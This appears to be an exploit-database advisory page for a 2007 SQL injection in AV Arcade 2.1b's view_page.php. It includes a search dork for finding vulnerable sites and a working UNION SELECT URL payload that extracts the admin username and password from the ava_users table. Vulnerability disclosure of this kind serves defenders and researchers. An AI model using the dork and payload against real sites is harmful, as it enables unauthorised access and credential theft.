header-logo
Suggest Exploit
vendor:
AV Arcade
by:
Kw3rLn
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: AV Arcade
Affected Version From: AV Arcade 2.1b
Affected Version To: AV Arcade 2.1b
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

AV Arcade 2.1b SQL Injection Vulnerability

The vulnerability exists in the $id parameter of the view_page.php file, allowing an attacker to inject SQL code. By using a UNION SELECT statement, the attacker can retrieve the usernames and passwords of users from the ava_users table where the id is 1.

Mitigation:

Apply proper input validation and parameterized queries to prevent SQL injection attacks. Update to a patched version of AV Arcade if available.
Source

Exploit-DB raw data:

Web: AV Arcade 2.1b
Site : www.avscripts.net
Dork : "Powered By AV Arcade"

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET


Description: SQL injection in $id of includes/view_page.php

Exploit:
/index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20ava_users%20WHERE%20id=1

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ]

# milw0rm.com [2007-07-02]

Navigation

Suggest Exploit

Services By CQR